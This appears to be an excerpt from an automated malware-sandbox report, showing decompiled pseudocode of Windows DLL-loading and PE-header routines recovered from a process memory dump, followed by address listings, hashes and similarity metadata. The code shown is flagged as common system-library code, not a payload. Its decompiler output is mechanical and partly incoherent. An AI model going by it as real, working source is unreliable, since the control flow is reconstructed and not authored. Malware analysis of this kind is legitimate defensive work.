				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x496d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E04886600(0x49652d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x4967b9c; // 0x0
							_t281 = L04894620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E048BF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x4967b90; // 0x770b0000
								if(_t384 == 0) {
									_t353 =  *0x4967b8c; // 0x691d30
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0x693f68
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E04892280(_t200, 0x49684d8);
									_t277 =  *0x49685f4; // 0x694108
									_t351 =  *0x49685f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x750a0000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0x6930c8
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0x6940a0
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0x6930c8
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0x692f80
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0488FFB0(_t287, _t353, 0x49684d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E048CCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E04886600(0x49652d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E04887926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x496b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E048FE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x4968472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x496b218; // 0x0
														asm("ror edi, cl");
														 *0x496b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E04892280(_t250, 0x49684d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L048B3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0488FFB0(_t293, _t353, 0x49684d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E048B37F5(_t353, 0);
																}
																E048B0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E048A9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E048A02D6(_t174);
																}
																L048977F0( *0x4967b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E048AC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0488EC7F(_t353);
										L048A19B8(_t287, 0, _t353, 0);
										_t200 = E0487F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E048BB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x496b2f8; // 0xc30000
									if((_t206 |  *0x496b2fc) == 0 || ( *0x496b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x496b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E04926B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E04926AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0488E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0488EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E048B9730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0488E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L04888F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E048B3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                          0x0488d5f2
                          0x0488d5f5
                          0x0488d5f5
                          0x0488d5fd
                          0x0488d600
                          0x0488d60a
                          0x0488d60d
                          0x0488d617
                          0x0488d61d
                          0x0488d627
                          0x0488d62e
                          0x0488d911
                          0x0488d913
                          0x00000000
                          0x0488d919
                          0x0488d919
                          0x0488d919
                          0x0488d634
                          0x0488d634
                          0x0488d634
                          0x0488d634
                          0x0488d640
                          0x0488d8bf
                          0x00000000
                          0x0488d646
                          0x0488d646
                          0x0488d64d
                          0x0488d652
                          0x048db2fc
                          0x048db2fc
                          0x048db302
                          0x048db33b
                          0x048db341
                          0x00000000
                          0x048db304
                          0x048db304
                          0x048db319
                          0x048db31e
                          0x048db324
                          0x048db326
                          0x048db332
                          0x048db347
                          0x048db34c
                          0x048db351
                          0x048db35a
                          0x00000000
                          0x048db328
                          0x048db328
                          0x00000000
                          0x048db328
                          0x048db326
                          0x0488d658
                          0x0488d658
                          0x0488d65b
                          0x0488d665
                          0x00000000
                          0x0488d66b
                          0x0488d66b
                          0x0488d66b
                          0x0488d66b
                          0x0488d66d
                          0x0488d672
                          0x0488d67a
                          0x00000000
                          0x00000000
                          0x0488d680
                          0x0488d686
                          0x0488d8ce
                          0x0488d8d4
                          0x0488d8da
                          0x0488d8dd
                          0x0488d8dd
                          0x0488d8e0
                          0x0488d68c
                          0x0488d691
                          0x0488d69d
                          0x0488d6a2
                          0x0488d6a7
                          0x0488d6b0
                          0x0488d6b0
                          0x0488d6b5
                          0x0488d6e0
                          0x0488d6b7
                          0x0488d6b7
                          0x0488d6b9
                          0x0488d6b9
                          0x0488d6bb
                          0x0488d6bd
                          0x0488d6ce
                          0x0488d6d0
                          0x0488d6d2
                          0x048db363
                          0x048db365
                          0x00000000
                          0x048db36b
                          0x00000000
                          0x048db36b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0488d6bf
                          0x0488d6bf
                          0x0488d6e5
                          0x0488d6e7
                          0x0488d6e9
                          0x0488d6e9
                          0x0488d6ec
                          0x0488d6ec
                          0x0488d6ef
                          0x0488d6f5
                          0x0488d6f9
                          0x0488d6fb
                          0x0488d6fd
                          0x0488d701
                          0x0488d703
                          0x0488d70a
                          0x0488d70a
                          0x0488d70a
                          0x0488d701
                          0x0488d70d
                          0x0488d710
                          0x0488d710
                          0x0488d6c1
                          0x0488d6c1
                          0x0488d6c1
                          0x0488d6c6
                          0x048db36d
                          0x048db36f
                          0x00000000
                          0x048db375
                          0x048db375
                          0x048db375
                          0x00000000
                          0x048db375
                          0x00000000
                          0x0488d6cc
                          0x0488d6d8
                          0x0488d6d8
                          0x0488d6d8
                          0x00000000
                          0x0488d6c6
                          0x0488d6bf
                          0x00000000
                          0x0488d6da
                          0x0488d6da
                          0x0488d716
                          0x0488d71b
                          0x0488d720
                          0x0488d726
                          0x0488d726
                          0x0488d72d
                          0x00000000
                          0x0488d733
                          0x0488d739
                          0x0488d742
                          0x0488d750
                          0x0488d758
                          0x0488d764
                          0x0488d776
                          0x0488d77a
                          0x0488d783
                          0x0488d928
                          0x0488d92c
                          0x0488d93d
                          0x0488d944
                          0x0488d94f
                          0x0488d954
                          0x0488d956
                          0x0488d95f
                          0x0488d961
                          0x0488d973
                          0x0488d973
                          0x0488d956
                          0x0488d944
                          0x0488d92c
                          0x0488d78b
                          0x048db394
                          0x0488d791
                          0x0488d798
                          0x048db3a3
                          0x048db3bb
                          0x048db3bb
                          0x0488d7a5
                          0x0488d866
                          0x0488d870
                          0x0488d884
                          0x0488d892
                          0x0488d898
                          0x0488d89e
                          0x0488d8a0
                          0x0488d8a6
                          0x0488d8ac
                          0x0488d8ae
                          0x0488d8b4
                          0x0488d8b4
                          0x0488d8ae
                          0x0488d7a5
                          0x0488d78b
                          0x0488d7b1
                          0x048db3c5
                          0x048db3c5
                          0x0488d7c3
                          0x0488d7ca
                          0x0488d7e5
                          0x0488d7eb
                          0x0488d8eb
                          0x0488d8ed
                          0x00000000
                          0x0488d8f3
                          0x0488d8f3
                          0x0488d8f3
                          0x00000000
                          0x0488d8ed
                          0x0488d7cc
                          0x0488d7cc
                          0x0488d7d2
                          0x00000000
                          0x0488d7d4
                          0x0488d7d4
                          0x0488d7d7
                          0x0488d7df
                          0x048db3d4
                          0x048db3d9
                          0x048db3dc
                          0x048db3dc
                          0x048db3df
                          0x048db3e2
                          0x048db468
                          0x048db46d
                          0x048db46f
                          0x048db46f
                          0x048db475
                          0x0488d8f8
                          0x0488d8f9
                          0x0488d8fd
                          0x048db3e8
                          0x048db3e8
                          0x048db3eb
                          0x048db3ed
                          0x00000000
                          0x048db3ef
                          0x048db3ef
                          0x048db3f1
                          0x048db3f4
                          0x048db3fe
                          0x048db404
                          0x048db409
                          0x048db40e
                          0x048db410
                          0x048db410
                          0x048db414
                          0x048db414
                          0x048db41b
                          0x048db420
                          0x048db423
                          0x048db425
                          0x048db427
                          0x048db42a
                          0x048db42d
                          0x048db42d
                          0x048db42a
                          0x048db432
                          0x048db436
                          0x048db438
                          0x048db43b
                          0x048db43b
                          0x048db449
                          0x048db44e
                          0x048db454
                          0x048db458
                          0x048db458
                          0x048db45d
                          0x00000000
                          0x048db45d
                          0x048db3ed
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0488d7df
                          0x0488d7d2
                          0x0488d7ca
                          0x048db37c
                          0x048db37e
                          0x048db385
                          0x048db38a
                          0x00000000
                          0x048db38a
                          0x0488d742
                          0x0488d7f1
                          0x0488d7f8
                          0x048db49b
                          0x048db49b
                          0x0488d800
                          0x0488d837
                          0x0488d843
                          0x0488d845
                          0x0488d847
                          0x0488d84a
                          0x0488d84b
                          0x0488d84e
                          0x0488d857
                          0x0488d802
                          0x0488d802
                          0x0488d80d
                          0x00000000
                          0x0488d818
                          0x0488d818
                          0x0488d824
                          0x0488d831
                          0x048db4a5
                          0x048db4ab
                          0x048db4b3
                          0x048db4b8
                          0x048db4bb
                          0x00000000
                          0x048db4c1
                          0x048db4c1
                          0x048db4c8
                          0x00000000
                          0x048db4ce
                          0x048db4d4
                          0x048db4e1
                          0x048db4e3
                          0x048db4e5
                          0x00000000
                          0x048db4eb
                          0x048db4f0
                          0x048db4f2
                          0x0488dac9
                          0x0488dacc
                          0x0488dacf
                          0x0488dad1
                          0x0488dd78
                          0x0488dd78
                          0x0488dcf2
                          0x00000000
                          0x0488dad7
                          0x0488dad9
                          0x0488dadb
                          0x00000000
                          0x00000000
                          0x0488dae1
                          0x0488dae1
                          0x0488dae4
                          0x0488dae6
                          0x048db4f9
                          0x048db4f9
                          0x048db500
                          0x0488daec
                          0x0488daec
                          0x0488daf5
                          0x0488daf8
                          0x0488dafb
                          0x0488db03
                          0x0488db11
                          0x0488db16
                          0x0488db19
                          0x0488db1b
                          0x048db52c
                          0x048db531
                          0x048db534
                          0x0488db21
                          0x0488db21
                          0x0488db24
                          0x0488dcd9
                          0x0488dce2
                          0x0488dce5
                          0x0488dd6a
                          0x0488dd6d
                          0x00000000
                          0x0488dd73
                          0x048db51a
                          0x048db51c
                          0x048db51f
                          0x048db524
                          0x00000000
                          0x048db524
                          0x0488dce7
                          0x0488dce7
                          0x0488dce7
                          0x00000000
                          0x0488dce7
                          0x00000000
                          0x0488db2a
                          0x0488db2c
                          0x0488db31
                          0x0488db33
                          0x0488db36
                          0x0488db39
                          0x0488db3b
                          0x0488db66
                          0x0488db66
                          0x0488db3d
                          0x0488db3d
                          0x0488db3e
                          0x0488db46
                          0x0488db47
                          0x0488db49
                          0x0488db4c
                          0x0488db53
                          0x0488db55
                          0x0488db58
                          0x0488db5a
                          0x048db50a
                          0x048db50f
                          0x048db512
                          0x0488db60
                          0x0488db60
                          0x0488db63
                          0x0488db63
                          0x00000000
                          0x0488db63
                          0x0488db5a
                          0x0488db3b
                          0x0488db24
                          0x0488db69
                          0x0488db69
                          0x0488db6c
                          0x0488db6f
                          0x0488db74
                          0x048db557
                          0x048db557
                          0x048db55e
                          0x0488db7a
                          0x0488db7c
                          0x0488db7f
                          0x0488db82
                          0x0488db85
                          0x00000000
                          0x0488db8b
                          0x0488db8b
                          0x0488db8d
                          0x0488db9b
                          0x0488db9b
                          0x0488db9d
                          0x0488dba0
                          0x0488dba2
                          0x0488dba4
                          0x0488dba7
                          0x0488dba9
                          0x0488dbae
                          0x0488dbae
                          0x0488dbb1
                          0x0488dbb4
                          0x0488dbb4
                          0x0488dbb7
                          0x0488dbba
                          0x0488dcd2
                          0x0488dcd4
                          0x00000000
                          0x0488dbc0
                          0x0488dbc0
                          0x0488dbd2
                          0x0488dbd7
                          0x0488dbda
                          0x0488dbdd
                          0x0488dbdf
                          0x00000000
                          0x0488dbe5
                          0x0488dbe5
                          0x0488dbee
                          0x0488dbf1
                          0x048db541
                          0x048db544
                          0x00000000
                          0x048db546
                          0x048db546
                          0x00000000
                          0x048db546
                          0x0488dbf7
                          0x0488dbf7
                          0x0488dbfd
                          0x0488dbfd
                          0x0488dbff
                          0x0488dc0b
                          0x0488dc15
                          0x0488dc1b
                          0x0488dc1d
                          0x0488dc21
                          0x0488dc21
                          0x0488dc23
                          0x0488dc23
                          0x0488dc26
                          0x0488dc29
                          0x0488dc2b
                          0x00000000
                          0x00000000
                          0x0488dc31
                          0x0488dc34
                          0x0488dc36
                          0x0488dcbf
                          0x0488dcbf
                          0x0488dcc2
                          0x00000000
                          0x0488dc3c
                          0x0488dc41
                          0x0488dc43
                          0x00000000
                          0x0488dc45
                          0x0488dc45
                          0x0488dc47
                          0x00000000
                          0x0488dc4d
                          0x0488dc4d
                          0x0488dc50
                          0x0488dc52
                          0x0488dc55
                          0x0488dcfa
                          0x0488dcfe
                          0x0488dd08
                          0x0488dd0a
                          0x0488dd0c
                          0x00000000
                          0x0488dd12
                          0x0488dd15
                          0x0488dd2d
                          0x0488dd2f
                          0x0488dd32
                          0x0488dd35
                          0x00000000
                          0x0488dd35
                          0x0488dc5b
                          0x0488dc5b
                          0x0488dc5e
                          0x0488dc61
                          0x0488dc64
                          0x0488dc67
                          0x0488dc67
                          0x0488dc6a
                          0x0488dc6c
                          0x0488dc8e
                          0x0488dc8e
                          0x0488dc91
                          0x0488dc93
                          0x0488dcce
                          0x0488dcce
                          0x0488dc95
                          0x0488dc9c
                          0x0488dc6e
                          0x0488dc72
                          0x0488dc75
                          0x0488dc77
                          0x0488dc79
                          0x048db551
                          0x048db551
                          0x00000000
                          0x0488dc7f
                          0x0488dc7f
                          0x0488dc81
                          0x00000000
                          0x0488dc83
                          0x0488dc86
                          0x0488dc88
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0488dc88
                          0x0488dc81
                          0x0488dc79
                          0x0488dc6c
                          0x0488dc55
                          0x0488dc47
                          0x0488dc43
                          0x00000000
                          0x0488dc36
                          0x0488dc23
                          0x00000000
                          0x0488dbff
                          0x0488dbf1
                          0x0488dbdf
                          0x0488db8f
                          0x0488db92
                          0x0488db95
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0488db95
                          0x0488db8d
                          0x0488db85
                          0x0488db74
                          0x0488dc9f
                          0x0488dca2
                          0x0488dcb0
                          0x0488dcb0
                          0x0488dad1
                          0x048db4e5
                          0x048db4c8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0488d831
                          0x0488d80d
                          0x00000000
                          0x0488d800
                          0x048db47f
                          0x048db485
                          0x00000000
                          0x048db485
                          0x0488d665
                          0x0488d652
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c35b14c8e4f9c4c0fa6cbe6a9b8ea02aceea27f120eab43f343758e467ed969f
                          • Instruction ID: 77344e42ae00f6f50443049ba10703b73e054f60f36be69e512e7d450e599da7
                          • Opcode Fuzzy Hash: c35b14c8e4f9c4c0fa6cbe6a9b8ea02aceea27f120eab43f343758e467ed969f
                          • Instruction Fuzzy Hash: D3E18D30A05259CFEB24EF28C940BA9B7F2AF45318F054BADD909D7290D774BD81CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0488849B, Relevance: .3, Instructions: 290COMMON
                          Download Yara Rule
                          C-Code - Quality: 92%
                          			E0488849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x494f9c0);
				E048CD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x4967b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0488CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E04892280( *[fs:0x30], 0x4968550);
						_t139 =  *0x4967b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E048AF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0488FFB0(_t193, _t235, 0x4968550);
								L5:
								return E048CD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E04871C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
